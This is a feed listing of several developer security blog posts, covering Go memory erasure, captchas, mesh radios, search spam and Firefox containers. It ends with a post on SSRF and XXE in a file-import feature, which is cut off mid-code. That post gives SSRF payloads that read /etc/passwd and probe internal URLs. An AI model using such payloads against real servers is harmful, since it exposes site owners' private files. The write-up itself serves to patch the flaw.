Posts in Security (20 found)

Go proposal: Secret mode

Part of the Accepted! series, explaining the upcoming Go changes in simple terms. Automatically erase used memory to prevent secret leaks. Ver. 1.26 • Stdlib • Low impact The new package lets you run a function in secret mode . After the function finishes, it immediately erases (zeroes out) the registers and stack it used. Heap allocations made by the function are erased as soon as the garbage collector decides they are no longer reachable. This helps make sure sensitive information doesn't stay in memory longer than needed, lowering the risk of attackers getting to it. The package is experimental and is mainly for developers of cryptographic libraries, not for application developers. Cryptographic protocols like WireGuard or TLS have a property called "forward secrecy". This means that even if an attacker gains access to long-term secrets (like a private key in TLS), they shouldn't be able to decrypt past communication sessions. To make this work, session keys (used to encrypt and decrypt data during a specific communication session) need to be erased from memory after they're used. If there's no reliable way to clear this memory, the keys could stay there indefinitely, which would break forward secrecy. In Go, the runtime manages memory, and it doesn't guarantee when or how memory is cleared. Sensitive data might remain in heap allocations or stack frames, potentially exposed in core dumps or through memory attacks. Developers often have to use unreliable "hacks" with reflection to try to zero out internal buffers in cryptographic libraries. Even so, some data might still stay in memory where the developer can't reach or control it. The solution is to provide a runtime mechanism that automatically erases all temporary storage used during sensitive operations. This will make it easier for library developers to write secure code without using workarounds. Add the package with and functions: The current implementation has several limitations: The last point might not be immediately obvious, so here's an example. If an offset in an array is itself secret (you have a array and the secret key always starts at ), don't create a pointer to that location (don't create a pointer to ). Otherwise, the garbage collector might store this pointer, since it needs to know about all active pointers to do its job. If someone launches an attack to access the GC's memory, your secret offset could be exposed. The package is mainly for developers who work on cryptographic libraries. Most apps should use higher-level libraries that use behind the scenes. As of Go 1.26, the package is experimental and can be enabled by setting at build time. Use to generate a session key and encrypt a message using AES-GCM: Note that protects not just the raw key, but also the structure (which contains the expanded key schedule) created inside the function. This is a simplified example, of course — it only shows how memory erasure works, not a full cryptographic exchange. In real situations, the key needs to be shared securely with the receiver (for example, through key exchange) so decryption can work. 𝗣 21865 • 𝗖𝗟 704615 • 👥 Daniel Morsing , Dave Anderson , Filippo Valsorda , Jason A. Donenfeld , Keith Randall , Russ Cox Only supported on linux/amd64 and linux/arm64. On unsupported platforms, invokes directly. Protection does not cover any global variables that writes to. Trying to start a goroutine within causes a panic. If calls , erasure is delayed until all deferred functions are executed. Heap allocations are only erased if ➊ the program drops all references to them, and ➋ then the garbage collector notices that those references are gone. The program controls the first part, but the second part depends on when the runtime decides to act. If panics, the panicked value might reference memory allocated inside . That memory won't be erased until (at least) the panicked value is no longer reachable. Pointer addresses might leak into data buffers that the runtime uses for garbage collection. Do not put confidential information into pointers.

0 views
Jeff Geerling 6 days ago

Why doesn't Apple make a standalone Touch ID?

I finally upgraded to a mechanical keyboard. But because Apple's so protective of their Touch ID hardware, there aren't any mechanical keyboards with that feature built in. But there is a way to hack it. It's incredibly wasteful, and takes a bit more patience than I think most people have, but you basically take an Apple Magic Keyboard with Touch ID, rip out the Touch ID, and install it in a 3D printed box, along with the keyboard's logic board.

0 views
Hugo 1 weeks ago

Implementing a tracking-free captcha with Altcha and Nuxt

For the past few days, I've noticed several suspicious uses of my contact form. Looking closer, I noticed that each contact form submission was followed by a user signup with the same email and a name that always followed the same pattern: qSfDMiWAiLnpYYzdCeCWd fePXzKXbAmiLAweNZ etc... Let's just say their membership in the human species seems particularly dubious. Anyway, it's probably time to add some controls, and one of the most famous is the captcha. ## Next-generation captchas Everyone knows captchas – they're annoying, probably on par with cookie consent banners. Nowadays we see captchas where you have to identify traffic lights, solve additions, drag a puzzle piece to the right spot, and so on. But you may have noticed that lately we're also seeing simple forms with a checkbox: "I am not a robot". ![I'm not a robot](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1764749254941-124yicj.jpg) Sometimes the captcha isn't even visible anymore, with detection happening without asking you anything. So how does it work? And how can I add it to my application? ## Nuxt Turnstile, the default solution with Nuxt In the Nuxt ecosystem, the most common solution is [Nuxt turnstile](https://nuxt.com/modules/turnstile). The documentation is pretty clear on how to add it. It's a great solution, but it relies on [Cloudflare turnstile](https://nuxt.com/modules/turnstile), and I'm trying to use only european products for Writizzy and Hakanai. Still, the documentation helps understand a bit better how next-generation captchas work. When the page loads, the turnstile widget performs client-side checks: - **proof of space: **The script asks the client to generate and store an amount of data according to a predefined algorithm, then asks for the byte at a given position. Not only does this take time, but it's difficult to automate at scale. - **trivial browser detections:** The idea is to try to detect a bot (no plugins, webdriver control, etc.). Fingerprinting also helps in this case. It collects all available info about the browser, OS, available APIs, resolution, etc. Note that fingerprinting can be frowned upon by GDPR, which may consider it as uniquely identifying a person. Personally, I find that debatable, but in the context of anti-spam protection, we're kind of chasing our tail here since it would be necessary to ask bots for their permission to try to detect them. We're at the limits of absurdity here. But let's continue. Based on the previous info, the script sends all this to Cloudflare. Based on this info and relying on a huge database of worldwide traffic, Cloudflare calculates a percentage chance that the user is a bot. The form will vary between: - nothing to do, Cloudflare is convinced it's a human - a checkbox "I am not a robot" - a more elaborate captcha if the suspicion is really strong - a blocking page when there's no doubt about the suspicion Now, you might say, the checkbox is a bit light, isn't it? If I've gotten this far, I can easily automate a click on a checkbox. Especially since Cloudflare is everywhere, it's necessarily the same form everywhere. Yes... But... First, the way you check the box will be analyzed. Is the click too fast, does it seem automated, is the mouse path to reach the box natural? All this can trigger additional protection. *EDIT: Turnstile might not do this operation. reCaptcha, Google's solution, is known for doing it. Turnstile is less explicit on the subject.* But on top of that, the checkbox triggers a challenge, a small calculation requested by Cloudflare that your client must perform. The result is what we call a **proof of work**. This work is slow for a computer. We're talking about 500ms, an eternity for a machine. For a human user, it's totally anecdotal. And the satisfaction of having proven their humanity makes you forget those 500 little milliseconds. On the other hand, for a bot, this time will be a real problem if it needs to automate the creation of hundreds or thousands of accounts. So it's not impossible to check this box, but it's costly. And it's supposed to make the economic equation uninteresting at high volumes. Now, even though all this is nice, I still don't want to use Cloudflare, so how do I replace it? ## Altcha, an open-source alternative During my research, I came across [altcha](https://altcha.org/). The solution is open source, requires no calls to external servers, and shares no data. The implementation requires requesting the Proof of Work (the famous JavaScript challenge) from your server. Here we'll initiate it from the Nuxt backend, in a handler: typescript ```typescript // server/api/altcha/challenge.get.ts import { createChallenge } from 'altcha-lib' export default defineEventHandler(async () => { const hmacKey = useRuntimeConfig().altchaHmacKey as string return createChallenge({ hmacKey, maxnumber: 100000, expires: new Date(Date.now() + 60000) // 1 minute }) }) ``` In the contact form page, we'll add a Vue component: vue ```vue ``` This `altchaPayload` will be added to the post payload, for example: typescript ```typescript await $fetch('/api/contact', { method: 'POST', body: { email: loggedIn.value ? user.value?.email : event.data.email, subject: event.data.subject, message: event.data.message, altcha: altchaPayload.value } }) ``` The calculation result will then be verified in the `/api/contact` endpoint typescript ```typescript const hmacKey = useRuntimeConfig().altchaHmacKey as string const ok = await verifySolution(data.altcha, hmacKey) if (!ok) { throw createError({ statusCode: 400, message: 'Invalid challenge' }) } ``` The Vue component I mentioned earlier is this one: vue ```vue ``` And there you go, the [contact page](https://pulse.hakanai.io/contact) and the [signup page](https://pulse.hakanai.io/signup) are now protected by this altcha. Now, does it work? ## Altcha's limitations The implementation was done yesterday. And unfortunately, I'm still seeing very suspicious signups on Pulse. So clearly, Altcha didn't do its job. However, now that we know how it works, it's easier to understand why it doesn't work. Altcha doesn't do any of the checks that Turnstile does: - no proof of space - no fingerprinting - no fingerprint verification with Cloudflare - no behavioral verification of the mouse click on the checkbox. The only protection is the proof of work, which only costs the attacker time. Now for Pulse, for reasons I don't understand, the person having fun creating accounts makes about 4 per day. The cost of the proof of work is negligible in this case. So Altcha is not suited for this type of "slow attack". Anyway, I'll have to find another workaround... And I'm open to your suggestions.

0 views
Michael Lynch 1 weeks ago

My First Impressions of MeshCore Off-Grid Messaging

When my wife saw me playing with my new encrypted radio, she asked what it was for. “Imagine,” I said, “if I could type a message on my phone and send it to you, and the message would appear on your phone. Instantly!” She wasn’t impressed. “It also works if phone lines are down due to a power outage… or societal collapse.” Still nothing. “If we’re not within radio range of each other, we can route our messages through a mesh network of our neighbors’ radios. But don’t worry! The radios encrypt our messages end-to-end, so nobody else can read what we’re saying.” By this point, she’d left the room. My wife has many wonderful qualities, but, if I’m being honest, “enthusiasm for encrypted off-grid messaging” has never been one of them. The technology I was pitching to my wife was, of course, MeshCore. If you’d like to skip to the end, check out the summary . MeshCore is software that runs on inexpensive long-range (LoRa) radios . LoRa radios transmit up to several miles depending on how clear the path is. Unlike HAM radios, you don’t need a license to broadcast over LoRa frequencies in the US, so anyone can pick up a LoRa radio and start chatting. MeshCore is more than just sending messages over radio. The “mesh” in the name is because MeshCore users form a mesh network. If Alice wants to send a message to her friend Charlie, but Charlie’s out of range of her radio, she can route her message through Bob, another MeshCore user in her area, and Bob will forward the message to Charlie. If Alice is within radio range of Bob but not Charlie, she can tell Bob’s MeshCore radio to forward her message to Charlie. I’m not exactly a doomsday prepper, but I plan for realistic disaster scenarios like extended power outages, food shortages, and droughts. When I heard about MeshCore, I thought it would be neat to give some devices to friends nearby so we could communicate in an emergency. And if it turned out that we’re out of radio range of each other, maybe I could convince a few neighbors to get involved as well. We could form a messaging network that’s robust against power failures and phone outages. MeshCore is a newer implementation of an idea that was popularized by a technology called Meshtastic . I first heard about Meshtastic from Tyler Cipriani’s 2022 blog post . I thought the idea sounded neat, but Tyler’s conclusion was that Meshtastic was too buggy and difficult for mainstream adoption at the time. I have no particular allegiance to MeshCore or Meshtastic, as I’ve never tried either. Some people I follow on Mastodon have been excited about MeshCore, so I thought I’d check it out. Most MeshCore-compatible devices are also compatible with Meshtastic, so I can easily experiment with one and later try the other. I only have a limited understanding of the differences between Meshtastic and MeshCore, but what I gather is that MeshCore’s key differentiator is preserving bandwidth. Apparently, Meshtastic hits scaling issues when many users are located close to each other. The Meshtastic protocol is chattier than MeshCore, so I’ve seen complaints that Meshtastic chatter floods the airwaves and interferes with message delivery. MeshCore attempts to solve that problem by minimizing network chatter. I should say at this point that I’m not a radio guy. It seems like many people in the LoRa community are radio enthusiasts who have experience with HAM radios or other types of radio broadcasting. I’m a tech-savvy software developer, but I know nothing about radio communication. If I have an incorrect mental model of radio transmission, that’s why. The MeshCore firmware runs on a couple dozen devices, but the official website recommends three devices in particular. The cheapest one is the Heltec v3. I bought two for $27/ea. At $27, the Heltec v3 is the cheapest MeshCore-compatible device I could find. I connected the Heltec v3 to my computer via the USB-C port and used the MeshCore web flasher to flash the latest firmware. I selected “Heltec v3” as my device, “Companion Bluetooth” as the mode, and “v1.9.0” as the version. I clicked “Erase device” since this was a fresh install. Then, I used the MeshCore web app to pair the Heltec with my phone over Bluetooth. Okay, I’ve paired my phone with my MeshCore device, but… now what? The app doesn’t help me out much in terms of onboarding. I try clicking “Map” to see if there are any other MeshCore users nearby. Okay, that’s a map of New Zealand. I live in the US, so that’s a bit surprising. Even if I explore the map, I don’t see any MeshCore activity anywhere, so I don’t know what the map is supposed to do. The map of New Zealand reminded me that different countries use different radio frequencies for LoRa, and if the app defaults to New Zealand’s location, it’s probably defaulting to New Zealand broadcast frequencies as well. I went to settings and saw fields for “Radio Settings,” and I clicked them expecting a dropdown, but it expects me to enter a number. And then I noticed a subtle “Choose Preset” button, which listed presets for different countries that were “suggested by the community.” I had no idea what any of them meant, but who am I to argue with the community? I chose “USA/Canada (Recommended).” I also noticed that the settings let me change my device name, so that seemed useful: It seemed like there were no other MeshCore users within range of me, which I expected. That’s why I bought the second Heltec. I repeated the process with an old phone and my second Heltec v3, but they couldn’t see each other. I eventually realized that I’d forgotten to configure my second device for the US frequency. This is another reason I wish the MeshCore app took initial onboarding more seriously. Okay, they finally see each other! They can both publish messages to the public channel. My devices could finally talk to each other over a public channel. If I communicate with friends over MeshCore, I don’t want to broadcast our whole conversation over the public channel, so it was time to test out direct messaging. I expected some way to view a contact in the public channel and send them a direct message, but I couldn’t. Clicking their name did nothing. There’s a “Participants” view, but the only option is to block, not send a direct message. This seems like an odd design choice. If a MeshCore user posts to the public channel, why can’t I talk to them? I eventually figured out that I have to “Advert.” There are three options: “Zero Hop,” “Flood Routed,” and “To Clipboard.” I don’t know what any of these mean, but I figure “flood” sounds kind of rude, whereas “Zero Hop” sounds elegant, so I do a “Zero Hop.” Great! Device 2 now sees device 1. Let’s say hi to Device 1 from Device 2. Whoops, what’s wrong? Maybe I need to “Advert” from Device 2 as well? Okay, I do, and voila! Messages now work. This is a frustrating user experience. If I have to advert from both ends, why did MeshCore let me send a message on a half-completed handshake? I’m assuming “Advert” is me announcing my device’s public key, but I don’t understand why that’s an explicit step I have to do ahead of time. Why can’t MeshCore do that implicitly when I post to a public channel or attempt to send someone a direct message? Anyway, I can talk to myself in both public channels and DMs. Onward! The Heltec v3 boards were a good way to experiment with MeshCore, but they’re impractical for real-world scenarios. They require their own power source, and a phone to pair. I wanted to power it from my phone with a USB-C to USB-C cable, but the Heltec board wouldn’t power up from my phone. In a real emergency, that’s too many points of failure. The MeshCore website recommends two other MeshCore-compatible devices, so I ordered those: the Seeed SenseCAP T-1000e ($40) and the Lilygo T-Deck+ ($100). I bought the Seeed SenseCAP T-1000e (left) and the Lilygo T-Deck+ (right) to continue experimenting with MeshCore. The T-1000e was a clear improvement over the Heltec v3. It’s self-contained and has its own battery and antenna, which feels simpler and more robust. It’s also nice and light. You could toss it into a backpack and not notice it’s there. The T-1000e feels like a more user-friendly product compared to the bare circuit board of the Heltec v3. Annoyingly, the T-1000e uses a custom USB cable, so I can’t charge it or flash it from my computer with one of my standard USB cables: The Seeed T-1000e uses a custom USB cable for charging and flashing. I used the web flasher for the Heltec, but I decided to try flashing the T-1000e directly from source: I use Nix, and the repo conveniently has a , so the dependencies installed automatically with . I then flashed the firmware for the T-1000e like this: From there, I paired the T-1000e with my phone, and it was basically the same as using the Heltec. The only difference was that the T-1000e has no screen, so it defaults to the Bluetooth pairing password of . Does that mean anyone within Bluetooth range can trivially take over my T-1000e and read all my messages? It also seems impossible to turn off the T-1000e, which is undesirable for a broadcasting device. The manufacturer advises users to just leave it unplugged for several days until the battery runs out. Update : MeshCore contributor Frieder Schrempf just fixed this in commit 07e7e2d , which is included in the v.1.11.0 MeshCore firmware. You can now power off the device by holding down the button at the top of the T-1000e. Now it was time to test the Lilygo T-Deck. This was the part of MeshCore I’d been most excited about since the very beginning. If I handed my non-techy friends a device like the T-1000e, there were too many things that could go wrong in an actual emergency. “Oh, you don’t have the MeshCore app? Oh, you’re having trouble pairing it with your phone? Oh, your phone battery is dead?” The T-Deck looked like a 2000s era Blackberry. It seemed dead-simple to use because it was an all-in-one device: no phone pairing step or app to download. I wanted to buy a bunch, and hand them out to my friends. If society collapsed and our city fell into chaos, we’d still be able to chat on our doomsday hacker Blackberries like it was 2005. As soon as I turned on my T-Deck, my berry was burst. This was not a Blackberry at all. As a reminder, this is what a Blackberry looked like in 2003: A Blackberry smartphone in 2003 Before I even get to the T-Deck software experience, the hardware itself is so big and clunky. We can’t match the quality of a hardware product that we produced 22 years ago ? Right off the bat, the T-Deck was a pain to use. You navigate the UI by clicking a flimsy little thumbwheel in the center of the device, but it’s temperamental and ignores half of my scrolls. Good news: there’s a touchscreen. But the touchscreen misses half my taps: There are three ways to “click” a UI element. You can click the trackball, push the “Enter” key, or tap the screen. Which one does a particular UI element expect? You just have to try all three to find out! I had a hard time even finding instructions for how to reflash the T-Deck+. I found this long Jeff Geerling video where he expresses frustration with how long it took him to find reflashing instructions… and then he never explains how he did it! This is what worked for me: Confusingly, there’s no indication that the device is in DFU mode. I guess the fact that the screen doesn’t load is sort of an indication. On my system, I also see logs indicating a connection. Once I figured out how to navigate the T-Deck, I tried messaging, and the experience remained baffling. For example, guess what screen I’m on here: What does this screen do? If you guessed “chat on Public channel,” you’re a better guesser than I am, because the screen looks like nothing to me. Even when it displays chat messages, it only vaguely looks like a chat interface: Oh, it’s a chat UI. I encountered lots of other instances of confusing UX, but it’s too tedious to recount them all here. The tragic upshot for me is that this is not a device I’d rely on in an emergency. There are so many gotchas and dead-ends in the UX that would trip people up and prevent them from communicating with me. Even though the T-Deck broke my heart, I still hoped to use MeshCore with a different device. I needed to see how these devices worked in the real world rather than a few inches away from each other on my desk. First, I took my T-1000e to a friend’s house about a mile away and tried messaging the Heltec back in my home office. The transmission failed, as it seemed the two devices couldn’t see each other at all from that distance. Okay, fair enough. I’m in a suburban neighborhood, and there are lots of houses, trees, and cars between my house and my friend’s place. The next time I was riding in a car away from my house, I took along my T-1000e and tried messaging the Heltec v3 in my office. One block away: messages succeeded. Three blocks away: still working. Five blocks away: failure. And then I was never able to reach my home device until returning home later that day. Maybe the issue is the Heltec? I keep trying to leave the Heltec at home, but I read that the Heltec v3 has a particularly weak antenna. I tried again by leaving my T-1000e at home and taking the T-Deck out with me. I could successfully message my T-1000e from about five blocks away, but everything beyond that failed. The other part of the MeshCore ecosystem I haven’t mentioned yet is repeaters. The SenseCAP Solar P1-Pro , a solar-powered MeshCore repeater MeshCore repeaters are like WiFi extenders. They receive MeshCore messages and re-broadcast them to extend their reach. Repeaters are what create the “mesh” in MeshCore. The repeaters send messages to other repeaters and carry your MeshCore messages over longer distances. There are some technologically cool repeaters available. They’re solar powered with an internal battery, so they run independently and can survive a few days without sun. The problem was that I didn’t know how much difference a repeater makes. A repeater with a strong antenna would broadcast messages well, but does that solve my problem? If my T-Deck can’t send messages to my T-1000e from six blocks away, how is it going to reach the repeater? By this point, my enthusiasm for MeshCore had waned, and I didn’t want to spend another $100 and mount a broadcasting device to my house when I didn’t know how much it would improve my experience. MeshCore’s firmware is open-source , so I took a look to see if there was anything I could do to improve the user experience on the T-Deck. The first surprise with the source code was that there were no automated tests. I wrote simple unit tests , but nobody from the MeshCore team has responded to my proposal, and it’s been about two months. From casually browsing, the codebase feels messy but not outrageously so. It’s written in C++, and most of the classes have a large surface area with 20+ non-private functions and fields, but that’s what I see in a lot of embedded software projects. Another code smell was that my unit test calls the function, which encodes raw bytes to a hex string . MeshCore’s implementation depends on headers for two crypto libraries , even though the function has nothing to do with cryptography. It’s the kind of needless coupling MeshCore would avoid if they wrote unit tests for each component. My other petty gripe was that the code doesn’t have consistent style conventions. Someone proposed using the file that’s already in the repo , but a maintainer closed the issue with the guidance, “Just make sure your own IDE isn’t making unnecessary changes when you do a commit.” Why? Why in 2025 do I have to think about where to place my curly braces to match the local style? Just set up a formatter so I don’t have to think about mundane style issues anymore. I originally started digging into the MeshCore source to understand the T-Deck UI, but I couldn’t find any code for it. I couldn’t find the source to the MeshCore Android or web apps either. And then I realized: it’s all closed-source. All of the official MeshCore client implementations are closed-source and proprietary. Reading the MeshCore FAQ , I realized critical components are closed-source. What!?! They’d advertised this as open-source! How could they trick me? And then I went back to the MeshCore website and realized they never say “open-source” anywhere. I must have dreamed the part where they advertised MeshCore as open-source. It just seems like such an open-source thing that I assumed it was. But I was severely disappointed to discover that critical parts of MeshCore are proprietary. Without open-source clients, MeshCore doesn’t work for me. I’m not an open-source zealot, and I think it’s fine for software to be proprietary, but the whole point of off-grid communication is decentralization and technology freedom, so I can’t get on board with a closed-source solution. Some parts of the MeshCore ecosystem are indeed open-source and liberally licensed, but critically the T-Deck firmware, the web app, and the mobile apps are all closed-source and proprietary. The firmware I flashed to my Heltec v3 and T-1000e is open-source, but the mobile and Android apps (clients) I used to use the radios were closed-source and proprietary. As far as I see, there are no open-source MeshCore clients aside from the development CLI . I still love the idea of MeshCore, but it doesn’t yet feel practical for communicating in an emergency. The software is too difficult to use, and I’ve been unable to send messages farther than five blocks (about 0.3 miles). I’m open to revisiting MeshCore, but I’m waiting on open-source clients and improvements in usability. Disconnect the T-Deck from USB-C. Power off the T-Deck. Connect the T-Deck to your computer via the USB-C port. Hold down the thumbwheel in the center. Power on the device. It is incredibly cool to send text messages without relying on a big company’s infrastructure. The concept delights the part of my brain that enjoys disaster prep. MeshCore runs on a wide variety of low-cost devices, many of which also work for Meshtastic. There’s an active, enthusiastic community around it. All of the official MeshCore clients are closed-source and proprietary. The user experience is too brittle for me to rely on in an emergency, especially if I’m trying to communicate with MeshCore beginners. Most of the hardware assumes you’ll pair it with your mobile phone over Bluetooth, which introduces many more points of failure and complexity. The only official standalone device is the T-Deck+, but I found it confusing and frustrating to use. There’s no written getting started guide. There’s a FAQ , but it’s a hodgepodge of details without much organization. There’s a good unofficial intro video , but I prefer text documentation.

0 views
iDiallo 1 weeks ago

How I Became a Spam Vector

There are several reasons for Google to downrank a website from their search results. My first experience with downranking was on my very first day at a job in 2011. The day I walked into the building, Google released their first Panda update . My new employer, being a "content creator," disappeared from search results. This was a multi-million dollar company that had teams of writers and a portfolio of websites. They depended on Google, and not appearing in search meant we went on code red that first day. But it's not just large companies. Just this year, as AI Overview has dominated the search page, I've seen traffic to this blog falter. At one point, the number of impressions was increasing, yet the number of clicks declined. I mostly blamed it on AI Overview, but it didn't take long before impressions also dropped. It wasn't such a big deal to me since the majority of my readers now come through RSS. Looking through my server logs, I noticed that web crawlers had been accessing my search page at an alarming rate. And the search terms were text promoting spammy websites: crypto, gambling, and even some phishing sites. That seemed odd to me. What's the point of searching for those terms on my website if it's not going to return anything? In fact, there was a bug on my search page. If you entered Unicode characters, the page returned a 500 error. I don't like errors, so I decided to fix it. You can now search for Unicode on my search page. Yay! But it didn't take long for traffic to my website to drop even further. I didn't immediately make the connection, I continued to blame AI Overview. That was until I saw the burst of bot traffic to the search page. What I didn't take into account was that now that my search page was working, when you entered a spammy search term, it was prominently displayed on the page and in the page title. What I failed to see was that this was a vector for spammers to post links to my website. Even if those weren't actual anchor tags on the page, they were still URLs to spam websites. Looking through my logs, I can trace the sharp decline of traffic to this blog back to when I fixed the search page by adding support for Unicode. I didn't want to delete my search page, even though it primarily serves me for finding old posts. Instead, I added a single meta tag to fix the issue: What this means is that crawlers, like Google's indexing crawler, will not index the search page. Since the page is not indexed, the spammy content will not be used as part of the website's ranking. The result is that traffic has started to pick up once more. Now, I cannot say with complete certainty that this was the problem and solution to the traffic change. I don't have data from Google. However, I can see the direct effect, and I can see through Google Search Console that the spammy search pages are being added to the "no index" issues section. If you are experiencing something similar with your blog, it's worth taking a look through your logs, specifically search pages, to see if spammy content is being indirectly added. I started my career watching a content empire crumble under Google's algorithm changes, and here I am years later, accidentally turning my own blog into a spam vector while trying to improve it. The tools and tactics may have evolved, but something never changes. Google's search rankings are a delicate ecosystem, and even well-intentioned changes can have serious consequences. I often read about bloggers that never look past the content they write. Meaning, they don't care if you read it or not. But the problem comes when someone else takes advantage of your website's flaws. If you want to maintain control over your website, you have to monitor your traffic patterns and investigate anomalies. AI Overviews is most likely responsible for the original traffic drop, and I don't have much control over that. But it was also a convenient scape goat to blame everything on and excuse not looking deeper. I'm glad at least that my fix was something simple that anyone can implement.

1 views
Jim Nielsen 1 weeks ago

Malicious Traffic and Static Sites

I wrote about the 404s I serve for robots.txt . Now it’s time to look at some of the other common 404s I serve across my static sites (as reported by Netlify’s analytics): I don’t run WordPress, but as you can see I still get a lot of requests for resources. All of my websites are basically just static files on disk, meaning only GET requests are handled (no POST, PUT, PATCH, etc.). And there’s no authentication anywhere. So when I see these requests, I think: “Sure is nice to have a static site where I don’t have to worry about server maintenance and security patches for all those resources.” Of course, that doesn’t mean running a static site protects me from being exploited by malicious, vulnerability-seeking traffic. Here are a few more common requests I’m serving a 404 to: With all the magic building and bundling we do as an industry, I can see how easy it would be to have some sensitive data in your source repo (like the ones above) end up in your build output. No wonder there are bots scanning the web for these common files! So be careful out there. Just because you’ve got a static site doesn’t mean you’ve got no security concerns. Fewer, perhaps, but not none. Reply via: Email · Mastodon · Bluesky

0 views
devansh 1 weeks ago

Reflections on my 5 years at HackerOne

Today marks 5 years at HackerOne for me. I joined in 2020 as a Product Security Analyst while I was still an undergrad student. I’m grateful to now be serving as a Team Lead (Technical Services). A few reflections: Grateful for the people at HackerOne who took chances on me, challenged my thinking, and trusted me with more responsibility than I thought I was ready for. An even bigger thanks to the hackers whose reports I’ve had the chance to read over all these years. Five years in, still learning, still a work in progress :) None of this is solo. Good managers, patient teammates, and sharp hackers did more for my growth than any “self-made” narrative. Title changes are visible; real growth is not. It’s in how you listen, decide, and own mistakes. Luck is underrated. Being in a high-trust, high-talent environment at the right time matters more than we admit. "I don’t know" is not a weakness. It’s usually the start of the right conversation. As an Individual contributor, you optimize for being right. As a lead, you optimize for the team being effective. Very different job. Escalations and incidents expose culture fast. Blame travels down; responsibility travels up. Saying "no" clearly is kinder than saying "yes" and disappearing. Tools change every year. Principles - ownership, clarity, curiosity - don’t. If you stop learning, your experience is just 1 year repeated 5 times. Constraints are not excuses, they are design inputs for how you grow. Reading reports from hackers is a privilege, a free, continuous education from some of the sharpest minds on the internet. The hardest shift is from “How do I prove myself?” to “How do I make others successful?”. Calm execution during chaos beats heroic last-minute rescue every single time. Depth compounds. Understanding one concept end-to-end teaches you more than skimming ten. Feedback that makes you uncomfortable is usually the feedback you needed two months ago. High standards without empathy create fear. Empathy without standards creates mediocrity. You need both. You outgrow roles faster than you outgrow habits. Updating your habits is the real promotion. If everything is urgent, nothing is important. Prioritization is a leadership skill, not a calendar trick. Writing forces clarity. If you can’t explain it simply, you probably don’t understand it yet. Most “communication issues” are unasked questions and unspoken assumptions. Systems outlive heroes. Fix the system, don’t search for a savior. Being technically right and practically useless is still a miss. A 1% better process, repeated daily, beats a once-a-year “big transformation”. You can borrow context, but you can’t outsource judgment. That part you have to earn. Your manager sees some of the picture. Customers see another part. Hackers see yet another. Listen to all three. Imposter syndrome never fully leaves. You just learn to move with it instead of freezing because of it. Generosity with knowledge is not optional. Someone did it for you when you had nothing to trade. Gratitude is a strategy, not just a feeling. It keeps you curious, grounded, and willing to start at zero again. Stay hungry, very very hungry . The real hunger for growth can’t be fully satisfied, the moment it feels “enough,” it was never true hunger. The goalpost should keep moving, not out of insecurity, but out of a genuine desire to keep stretching what you can learn, build, and contribute.

0 views
fLaMEd fury 1 weeks ago

Contain The Web With Firefox Containers

What’s going on, Internet? While tech circles are grumbling about Mozilla stuffing AI features into Firefox that nobody asked for (lol), I figured I’d write about a feature people might actually like if they’re not already using it. This is how I’m containing the messy sprawl of the modern web using Firefox Containers. After the ability to run uBlock Origin, containers are easily one of Firefox’s best features. I’m happy to share my setup that helps contain the big bad evil and annoying across the web. Not because I visit these sites often or on purpose. I usually avoid them. But for the moments where I click something without paying attention, or I need to open a site just to get a piece of information and failing (lol, login walls), or I end up somewhere I don’t wanta to be. Containers stop that one slip from bleeding into the rest of my tabs. Firefox holds each site in its own space so nothing spills into the rest of my browsing. Here’s how I’ve split things up. Nothing fancy. Just tidy and logical. Nothing here is about avoiding these sites forever. It’s about containing them so they can’t follow me around. I use two extensions together: MAC handles the visuals. Containerise handles the rules. You can skip MAC and let Containerise auto create containers, but you lose control over colours and icons, so everything ends up looking the same. I leave MAC’s site lists empty so it doesn’t clash with Containerise. Containerise becomes the single source of truth. If I need to open something in a specific container, I just right click and choose Open in Container. Containers don’t fix the surveillance web, but they do reduce the blast radius. One random visit to Google, Meta, Reddit or Amazon won’t bleed into my other tabs. Cookies stay contained. Identity stays isolated. Tracking systems get far less to work with. Well, that’s my understanding of it anyway. It feels like one of the last features in modern browsers that still puts control back in the user’s hands, without having to give up the open web. Just letting you know that I used ChatGPT (in a container) to help me create the regex here - there was no way I was going to be able to figure that out myself. So while Firefox keeps pandering to the industry with AI features nobody asked for (lol), there’s still a lot to like about the browser. Containers, uBlock Origin, and the general flexibility of Firefox still give you real control over your internet experience. Hey, thanks for reading this post in your feed reader! Want to chat? Reply by email or add me on XMPP , or send a webmention . Check out the posts archive on the website. Firefox Multi Account Containers (MAC) for creating and customising the containers (names, colours, icons). Containerise for all the routing logic using regex rules.

0 views
Hugo 1 weeks ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked 